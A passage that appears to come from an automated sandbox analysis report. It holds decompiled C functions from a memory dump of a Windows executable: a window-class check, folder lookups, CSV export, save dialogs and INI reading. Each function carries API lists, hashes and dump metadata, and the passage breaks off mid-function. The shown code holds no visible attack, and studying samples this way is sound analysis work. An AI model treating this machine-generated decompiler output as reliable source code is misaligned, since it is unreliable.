                                                                                                                                                      				signed int _t11;
                                                                                                                                                      
                                                                                                                                                      				_v516 = _v516 & 0x00000000;
                                                                                                                                                      				memset( &_v514, 0, 0x1fe);
                                                                                                                                                      				GetClassNameW(_a4,  &_v516, 0xff);
                                                                                                                                                      				_t11 =  &_v516;
                                                                                                                                                      				_push(L"edit");
                                                                                                                                                      				_push(_t11);
                                                                                                                                                      				L0040E03E();
                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                      				return  ~_t11 + 1;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClassName_wcsicmpmemset
                                                                                                                                                      • String ID: edit
                                                                                                                                                      • API String ID: 2747424523-2167791130
                                                                                                                                                      • Opcode ID: d96ffc2340dd17deb26b5e0e58a9f5fe458e458e5f66db96c8edd361173f025a
                                                                                                                                                      • Instruction ID: 748b3c7a54d916a83871e5d55f64a5683e5b8dafeb1aa9d8bd9837731e8c37d4
                                                                                                                                                      • Opcode Fuzzy Hash: d96ffc2340dd17deb26b5e0e58a9f5fe458e458e5f66db96c8edd361173f025a
                                                                                                                                                      • Instruction Fuzzy Hash: D7E0927298031E6AEB20EBB0DC4AFA577ACAB04708F4006B5B914F10C2EAB4964A4A44
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040DA9D() {
                                                                                                                                                      				struct HINSTANCE__* _t1;
                                                                                                                                                      				_Unknown_base(*)()* _t2;
                                                                                                                                                      
                                                                                                                                                      				if( *0x413268 == 0) {
                                                                                                                                                      					_t1 = LoadLibraryW(L"shell32.dll");
                                                                                                                                                      					 *0x413268 = _t1;
                                                                                                                                                      					if(_t1 != 0) {
                                                                                                                                                      						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
                                                                                                                                                      						 *0x413264 = _t2;
                                                                                                                                                      						return _t2;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t1;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNEL32(shell32.dll,0040BEBF,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040DAAB
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040DAC0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                      • API String ID: 2574300362-880857682
                                                                                                                                                      • Opcode ID: afd27a41b0bfe2ea412867375fb9fe93228578f58e863494430a310e9e96df8a
                                                                                                                                                      • Instruction ID: 122d2585c685c0691ad6c3d54d7046cb00117d102b384f1c3bcadfb2245e5d9f
                                                                                                                                                      • Opcode Fuzzy Hash: afd27a41b0bfe2ea412867375fb9fe93228578f58e863494430a310e9e96df8a
                                                                                                                                                      • Instruction Fuzzy Hash: 5ED0C9F0A59300AAD720AF65AE097923AA4AB40713F149576E804F12B0D7B881C8CE6C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                      			E00408885(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				wchar_t* _v36;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				signed int _t39;
                                                                                                                                                      				wchar_t* _t41;
                                                                                                                                                      				signed int _t45;
                                                                                                                                                      				signed int _t48;
                                                                                                                                                      				wchar_t* _t53;
                                                                                                                                                      				wchar_t* _t62;
                                                                                                                                                      				wchar_t* _t63;
                                                                                                                                                      				wchar_t* _t64;
                                                                                                                                                      				void* _t68;
                                                                                                                                                      				void* _t69;
                                                                                                                                                      				intOrPtr* _t71;
                                                                                                                                                      				wchar_t* _t79;
                                                                                                                                                      				wchar_t* _t83;
                                                                                                                                                      
                                                                                                                                                      				_t68 = __ebx;
                                                                                                                                                      				_t79 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				if( *((intOrPtr*)(__ebx + 0x34)) > 0) {
                                                                                                                                                      					do {
                                                                                                                                                      						_t39 =  *( *((intOrPtr*)(_t68 + 0x38)) + _v8 * 4);
                                                                                                                                                      						_t71 = _a8;
                                                                                                                                                      						if(_t71 != _t79) {
                                                                                                                                                      							_t83 =  *((intOrPtr*)( *_t71))(_t39,  *((intOrPtr*)(_t68 + 0x68)));
                                                                                                                                                      						} else {
                                                                                                                                                      							_t83 =  *( *((intOrPtr*)(_t68 + 0x2e4)) + 0x10 + _t39 * 0x14);
                                                                                                                                                      						}
                                                                                                                                                      						_t41 = wcschr(_t83, 0x2c);
                                                                                                                                                      						_pop(_t69);
                                                                                                                                                      						if(_t41 != 0) {
                                                                                                                                                      							L10:
                                                                                                                                                      							_v36 = _t79;
                                                                                                                                                      							_v32 = _t79;
                                                                                                                                                      							_v28 = _t79;
                                                                                                                                                      							_v20 = 0x100;
                                                                                                                                                      							_v24 = 1;
                                                                                                                                                      							_v16 = 0x22;
                                                                                                                                                      							E004063DD( &_v16 | 0xffffffff, _t69,  &_v36, __eflags,  &_v16);
                                                                                                                                                      							while(1) {
                                                                                                                                                      								_t45 =  *_t83 & 0x0000ffff;
                                                                                                                                                      								__eflags = _t45;
                                                                                                                                                      								_v12 = _t45;
                                                                                                                                                      								_t81 =  &_v36;
                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = _t45 - 0x22;
                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                      									_push( &_v12);
                                                                                                                                                      									_t48 = 1;
                                                                                                                                                      									__eflags = 1;
                                                                                                                                                      								} else {
                                                                                                                                                      									_push(L"\"\"");
                                                                                                                                                      									_t48 = _t45 | 0xffffffff;
                                                                                                                                                      								}
                                                                                                                                                      								E004063DD(_t48, _t69, _t81, __eflags);
                                                                                                                                                      								_t83 =  &(_t83[0]);
                                                                                                                                                      								__eflags = _t83;
                                                                                                                                                      							}
                                                                                                                                                      							E004063DD( &_v16 | 0xffffffff, _t69,  &_v36, __eflags,  &_v16);
                                                                                                                                                      							_t53 = _v36;
                                                                                                                                                      							__eflags = _t53;
                                                                                                                                                      							if(_t53 == 0) {
                                                                                                                                                      								_t53 = 0x40f454;
                                                                                                                                                      							}
                                                                                                                                                      							E00408857(_t68, _t69, _a4, _t53);
                                                                                                                                                      							E00406355( &_v36);
                                                                                                                                                      							_t79 = 0;
                                                                                                                                                      							__eflags = 0;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t62 = wcschr(_t83, 0x22);
                                                                                                                                                      							_pop(_t69);
                                                                                                                                                      							if(_t62 != 0) {
                                                                                                                                                      								goto L10;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t63 = wcschr(_t83, 0xd);
                                                                                                                                                      								_pop(_t69);
                                                                                                                                                      								if(_t63 != 0) {
                                                                                                                                                      									goto L10;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t64 = wcschr(_t83, 0xa);
                                                                                                                                                      									_pop(_t69);
                                                                                                                                                      									if(_t64 != 0) {
                                                                                                                                                      										goto L10;
                                                                                                                                                      									} else {
                                                                                                                                                      										E00408857(_t68, _t69, _a4, _t83);
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						if(_v8 <  *((intOrPtr*)(_t68 + 0x34)) - 1) {
                                                                                                                                                      							E00408857(_t68, _t69, _a4, ",");
                                                                                                                                                      						}
                                                                                                                                                      						_v8 = _v8 + 1;
                                                                                                                                                      					} while (_v8 <  *((intOrPtr*)(_t68 + 0x34)));
                                                                                                                                                      				}
                                                                                                                                                      				return E00408857(_t68, _t69, _a4, L"\r\n");
                                                                                                                                                      			}


























                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcschr$memcpywcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1983396471-0
                                                                                                                                                      • Opcode ID: 756c7a8378e56e10f3d760d0e98006f26f38834ae28c740255de16beb5e598db
                                                                                                                                                      • Instruction ID: 891d09ae9378dccf635ba886e12c54397b7589aa880eb7d9b0c0a307a2786e7e
                                                                                                                                                      • Opcode Fuzzy Hash: 756c7a8378e56e10f3d760d0e98006f26f38834ae28c740255de16beb5e598db
                                                                                                                                                      • Instruction Fuzzy Hash: 5B41B431900214ABDF10FEA5C941AAE7BB8EF04328F50853FF891F72C2DB7899458A59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E0040A084(void* __eax, void* __eflags, wchar_t* _a4, intOrPtr _a8) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				signed int _t57;
                                                                                                                                                      				signed int _t58;
                                                                                                                                                      				intOrPtr _t60;
                                                                                                                                                      				intOrPtr _t62;
                                                                                                                                                      				intOrPtr _t66;
                                                                                                                                                      				intOrPtr _t67;
                                                                                                                                                      				signed int _t71;
                                                                                                                                                      				void* _t76;
                                                                                                                                                      				signed int _t80;
                                                                                                                                                      				wchar_t* _t91;
                                                                                                                                                      				void* _t92;
                                                                                                                                                      				void* _t94;
                                                                                                                                                      				void* _t95;
                                                                                                                                                      
                                                                                                                                                      				_t76 = __eax;
                                                                                                                                                      				E00407A66(__eax, __eflags);
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_t57 = 0;
                                                                                                                                                      				while(1) {
                                                                                                                                                      					_t91 = _a4;
                                                                                                                                                      					if(( *(_t91 + _t57 * 2) & 0x0000ffff) + 0xffffffd0 > 9) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					_t57 = _t57 + 1;
                                                                                                                                                      					if(_t57 < 1) {
                                                                                                                                                      						continue;
                                                                                                                                                      					}
                                                                                                                                                      					_t71 = wcslen(_t91);
                                                                                                                                                      					if(_t71 >= 3) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					_push(_t91);
                                                                                                                                                      					L0040E062();
                                                                                                                                                      					if(_t71 >= 0 && _t71 <  *((intOrPtr*)(_t76 + 0x34))) {
                                                                                                                                                      						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t76 + 0x38)) + _t71 * 4) * 0x14 +  *((intOrPtr*)(_t76 + 0x2e4))));
                                                                                                                                                      					}
                                                                                                                                                      					L19:
                                                                                                                                                      					if(_a8 != 0) {
                                                                                                                                                      						_v12 = _v12 | 0x00001000;
                                                                                                                                                      					}
                                                                                                                                                      					_t80 =  *0x4131d4; // 0x1
                                                                                                                                                      					_t58 = _v12;
                                                                                                                                                      					 *0x4131d4 =  *0x4131d4 + 1;
                                                                                                                                                      					 *((intOrPtr*)(0x4131d8 + _t80 * 4)) = _t58;
                                                                                                                                                      					return _t58;
                                                                                                                                                      				}
                                                                                                                                                      				__eflags =  *((intOrPtr*)(_t76 + 0x2e0));
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				if( *((intOrPtr*)(_t76 + 0x2e0)) <= 0) {
                                                                                                                                                      					L14:
                                                                                                                                                      					_t92 = 0;
                                                                                                                                                      					__eflags =  *((intOrPtr*)(_t76 + 0x2e0));
                                                                                                                                                      					_v8 = 0;
                                                                                                                                                      					if( *((intOrPtr*)(_t76 + 0x2e0)) <= 0) {
                                                                                                                                                      						goto L19;
                                                                                                                                                      					} else {
                                                                                                                                                      						goto L15;
                                                                                                                                                      					}
                                                                                                                                                      					do {
                                                                                                                                                      						L15:
                                                                                                                                                      						_t60 = E0040546C( *((intOrPtr*)(_t92 +  *((intOrPtr*)(_t76 + 0x2e4)) + 0x10)), _a4);
                                                                                                                                                      						_t62 = E0040546C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x48)) + _t92 + 0x10)), _a4);
                                                                                                                                                      						_t95 = _t95 + 0x10;
                                                                                                                                                      						__eflags = _t60;
                                                                                                                                                      						if(_t60 >= 0) {
                                                                                                                                                      							L17:
                                                                                                                                                      							_v12 =  *((intOrPtr*)(_t92 +  *((intOrPtr*)(_t76 + 0x2e4))));
                                                                                                                                                      							goto L18;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _t62;
                                                                                                                                                      						if(_t62 < 0) {
                                                                                                                                                      							goto L18;
                                                                                                                                                      						}
                                                                                                                                                      						goto L17;
                                                                                                                                                      						L18:
                                                                                                                                                      						_v8 = _v8 + 1;
                                                                                                                                                      						_t92 = _t92 + 0x14;
                                                                                                                                                      						__eflags = _v8 -  *((intOrPtr*)(_t76 + 0x2e0));
                                                                                                                                                      					} while (_v8 <  *((intOrPtr*)(_t76 + 0x2e0)));
                                                                                                                                                      					goto L19;
                                                                                                                                                      				}
                                                                                                                                                      				_t94 = 0;
                                                                                                                                                      				__eflags = 0;
                                                                                                                                                      				do {
                                                                                                                                                      					_push(_a4);
                                                                                                                                                      					_t66 =  *((intOrPtr*)(_t76 + 0x2e4));
                                                                                                                                                      					_push( *((intOrPtr*)(_t94 + _t66 + 0x10)));
                                                                                                                                                      					L0040E03E();
                                                                                                                                                      					_push(_a4);
                                                                                                                                                      					_t67 =  *((intOrPtr*)(_t76 + 0x48));
                                                                                                                                                      					_push( *((intOrPtr*)(_t67 + _t94 + 0x10)));
                                                                                                                                                      					L0040E03E();
                                                                                                                                                      					_t95 = _t95 + 0x10;
                                                                                                                                                      					__eflags = _t66;
                                                                                                                                                      					if(_t66 == 0) {
                                                                                                                                                      						L11:
                                                                                                                                                      						_v12 =  *(_t94 +  *((intOrPtr*)(_t76 + 0x2e4)));
                                                                                                                                                      						_v16 = 1;
                                                                                                                                                      						goto L12;
                                                                                                                                                      					}
                                                                                                                                                      					__eflags = _t67;
                                                                                                                                                      					if(_t67 != 0) {
                                                                                                                                                      						goto L12;
                                                                                                                                                      					}
                                                                                                                                                      					goto L11;
                                                                                                                                                      					L12:
                                                                                                                                                      					_v8 = _v8 + 1;
                                                                                                                                                      					_t94 = _t94 + 0x14;
                                                                                                                                                      					__eflags = _v8 -  *((intOrPtr*)(_t76 + 0x2e0));
                                                                                                                                                      				} while (_v8 <  *((intOrPtr*)(_t76 + 0x2e0)));
                                                                                                                                                      				__eflags = _v16;
                                                                                                                                                      				if(_v16 != 0) {
                                                                                                                                                      					goto L19;
                                                                                                                                                      				}
                                                                                                                                                      				goto L14;
                                                                                                                                                      			}





















                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00407A66: ??2@YAPAXI@Z.MSVCRT ref: 00407A87
                                                                                                                                                        • Part of subcall function 00407A66: ??3@YAXPAX@Z.MSVCRT ref: 00407B4E
                                                                                                                                                      • wcslen.MSVCRT ref: 0040A0B2
                                                                                                                                                      • _wtoi.MSVCRT ref: 0040A0BE
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040A10C
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040A11D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1549203181-0
                                                                                                                                                      • Opcode ID: 7dd6d63d10815eadb1078566161622f675861b17a3bacd31860cb4180f0995c0
                                                                                                                                                      • Instruction ID: 173153ae92e8ec93863a9f5982dcfa1c11e383f1bf25a9e136d2eac58130d476
                                                                                                                                                      • Opcode Fuzzy Hash: 7dd6d63d10815eadb1078566161622f675861b17a3bacd31860cb4180f0995c0
                                                                                                                                                      • Instruction Fuzzy Hash: D2415C31900304AFCB21DF69C580A9EBBB4EF44355F1444BAEC05EB396D678DAA18B59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040AB6E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				char _v16;
                                                                                                                                                      				char* _v20;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				char* _v28;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				char* _v36;
                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                      				char* _v44;
                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                      				char* _v52;
                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                      				char* _v60;
                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                      				char* _v68;
                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                      				char* _v76;
                                                                                                                                                      				char _v80;
                                                                                                                                                      				void _v2126;
                                                                                                                                                      				signed short _v2128;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				char _t32;
                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                      				char _t34;
                                                                                                                                                      				intOrPtr _t38;
                                                                                                                                                      				signed short _t57;
                                                                                                                                                      				char* _t62;
                                                                                                                                                      				char* _t64;
                                                                                                                                                      
                                                                                                                                                      				_v2128 = _v2128 & 0x00000000;
                                                                                                                                                      				memset( &_v2126, 0, 0x7fe);
                                                                                                                                                      				_t32 =  *((intOrPtr*)(L"txt")); // 0x780074
                                                                                                                                                      				_v16 = _t32;
                                                                                                                                                      				_t33 =  *0x410294; // 0x74
                                                                                                                                                      				_v12 = _t33;
                                                                                                                                                      				_t34 = E00406827(0x1f5);
                                                                                                                                                      				_t64 = L"*.txt";
                                                                                                                                                      				_v80 = _t34;
                                                                                                                                                      				_v76 = _t64;
                                                                                                                                                      				_v72 = E00406827(0x1f6);
                                                                                                                                                      				_v68 = _t64;
                                                                                                                                                      				_v64 = E00406827(0x1f7);
                                                                                                                                                      				_v60 = L"*.json";
                                                                                                                                                      				_v56 = E00406827(0x1fb);
                                                                                                                                                      				_v52 = L"*.csv";
                                                                                                                                                      				_t38 = E00406827(0x1f8);
                                                                                                                                                      				_t62 = L"*.htm;*.html";
                                                                                                                                                      				_v48 = _t38;
                                                                                                                                                      				_v44 = _t62;
                                                                                                                                                      				_v40 = E00406827(0x1f9);
                                                                                                                                                      				_v36 = _t62;
                                                                                                                                                      				_v32 = E00406827(0x1fa);
                                                                                                                                                      				_v28 = L"*.xml";
                                                                                                                                                      				_v24 = E00406827(0x1fc);
                                                                                                                                                      				_v20 = _t64;
                                                                                                                                                      				E00406050( &_v2128,  &_v80);
                                                                                                                                                      				_t57 = 7;
                                                                                                                                                      				return E00405DCD(_a12,  *((intOrPtr*)(_a4 + 0x208)), _a8,  &_v2128, E00406827(_t57),  &_v16);
                                                                                                                                                      			}

































                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040AB90
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                        • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                        • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                        • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                        • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                        • Part of subcall function 00406050: memset.MSVCRT ref: 00406071
                                                                                                                                                        • Part of subcall function 00406050: _snwprintf.MSVCRT ref: 0040609F
                                                                                                                                                        • Part of subcall function 00406050: wcslen.MSVCRT ref: 004060AB
                                                                                                                                                        • Part of subcall function 00406050: memcpy.MSVCRT ref: 004060C3
                                                                                                                                                        • Part of subcall function 00406050: wcslen.MSVCRT ref: 004060D1
                                                                                                                                                        • Part of subcall function 00406050: memcpy.MSVCRT ref: 004060E4
                                                                                                                                                        • Part of subcall function 00405DCD: GetSaveFileNameW.COMDLG32(?), ref: 00405E1C
                                                                                                                                                        • Part of subcall function 00405DCD: wcscpy.MSVCRT ref: 00405E33
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                                                      • String ID: *.htm;*.html$*.txt$txt
                                                                                                                                                      • API String ID: 1392923015-1706329710
                                                                                                                                                      • Opcode ID: 9ddafcd3e3873cef2600ad60d320d0a67768a4cae7d1907286cd4c839e47c819
                                                                                                                                                      • Instruction ID: 6a1f0fe5a8f9a0d06c10808573add6bd6f8ed95605c5985f6cf117c7f3196cfa
                                                                                                                                                      • Opcode Fuzzy Hash: 9ddafcd3e3873cef2600ad60d320d0a67768a4cae7d1907286cd4c839e47c819
                                                                                                                                                      • Instruction Fuzzy Hash: 5C215EB2D0121A9FCB40EF96D885ADDBBB4FF04308F10807BE409B7281DB7859418F99
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E00406613(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				signed int _t21;
                                                                                                                                                      				signed int _t23;
                                                                                                                                                      				void* _t24;
                                                                                                                                                      				signed int _t31;
                                                                                                                                                      				void* _t33;
                                                                                                                                                      				void* _t44;
                                                                                                                                                      				signed int _t46;
                                                                                                                                                      				void* _t48;
                                                                                                                                                      				signed int _t51;
                                                                                                                                                      				int _t52;
                                                                                                                                                      				void** _t53;
                                                                                                                                                      				void* _t58;
                                                                                                                                                      
                                                                                                                                                      				_t53 = __esi;
                                                                                                                                                      				_t1 =  &(_t53[1]); // 0x0
                                                                                                                                                      				_t51 =  *_t1;
                                                                                                                                                      				_t21 = 0;
                                                                                                                                                      				if(_t51 <= 0) {
                                                                                                                                                      					L4:
                                                                                                                                                      					_t2 =  &(_t53[2]); // 0x8
                                                                                                                                                      					_t33 =  *_t53;
                                                                                                                                                      					_t23 =  *_t2 + _t51;
                                                                                                                                                      					_t46 = 8;
                                                                                                                                                      					_t53[1] = _t23;
                                                                                                                                                      					_t24 = _t23 * _t46;
                                                                                                                                                      					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                                                                                                      					L0040E038();
                                                                                                                                                      					_t10 =  &(_t53[1]); // 0x0
                                                                                                                                                      					 *_t53 = _t24;
                                                                                                                                                      					memset(_t24, 0,  *_t10 << 3);
                                                                                                                                                      					_t52 = _t51 << 3;
                                                                                                                                                      					memcpy( *_t53, _t33, _t52);
                                                                                                                                                      					if(_t33 != 0) {
                                                                                                                                                      						_push(_t33);
                                                                                                                                                      						L0040E032();
                                                                                                                                                      					}
                                                                                                                                                      					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                                                                                                      					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t44 =  *__esi;
                                                                                                                                                      					_t48 = _t44;
                                                                                                                                                      					while( *_t48 != 0) {
                                                                                                                                                      						_t21 = _t21 + 1;
                                                                                                                                                      						_t48 = _t48 + 8;
                                                                                                                                                      						_t58 = _t21 - _t51;
                                                                                                                                                      						if(_t58 < 0) {
                                                                                                                                                      							continue;
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L4;
                                                                                                                                                      						}
                                                                                                                                                      						goto L7;
                                                                                                                                                      					}
                                                                                                                                                      					_t31 = _t21 << 3;
                                                                                                                                                      					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                                                                                                      					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                                                                                                      				}
                                                                                                                                                      				L7:
                                                                                                                                                      				return 1;
                                                                                                                                                      			}
















                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                      • Opcode ID: b3bebb2b07f3d72bfc287334a96ab2eb9d003ca0e48cb49cfb9246c624c4ecc5
                                                                                                                                                      • Instruction ID: 0097541d92ab95bcfef6608398cdc2c51d263adba4e227b481c9d82b5fae792d
                                                                                                                                                      • Opcode Fuzzy Hash: b3bebb2b07f3d72bfc287334a96ab2eb9d003ca0e48cb49cfb9246c624c4ecc5
                                                                                                                                                      • Instruction Fuzzy Hash: EB114C716046019FD328DF2DC881A26F7E9EFD8300B218D3EE59A97395DA76E811CB64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 35%
                                                                                                                                                      			E0040D5E8(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                                                                                                                      				char _v16390;
                                                                                                                                                      				short _v16392;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				intOrPtr* _t30;
                                                                                                                                                      				intOrPtr* _t34;
                                                                                                                                                      				signed int _t36;
                                                                                                                                                      				signed int _t37;
                                                                                                                                                      
                                                                                                                                                      				_t30 = __ecx;
                                                                                                                                                      				E0040E340(0x4004, __ecx);
                                                                                                                                                      				_push(0x4000);
                                                                                                                                                      				_push(0);
                                                                                                                                                      				_v16392 = 0;
                                                                                                                                                      				_t34 = _t30;
                                                                                                                                                      				_push( &_v16390);
                                                                                                                                                      				if(_a4 == 0) {
                                                                                                                                                      					memset();
                                                                                                                                                      					GetPrivateProfileStringW(_a8, _a12, 0x40f454,  &_v16392, 0x2000, _a20);
                                                                                                                                                      					asm("sbb esi, esi");
                                                                                                                                                      					_t37 =  ~_t36;
                                                                                                                                                      					E00405F0A( &_v16392, _t34, _a16);
                                                                                                                                                      				} else {
                                                                                                                                                      					memset();
                                                                                                                                                      					E00405E81(_a16,  *_t34,  &_v16392);
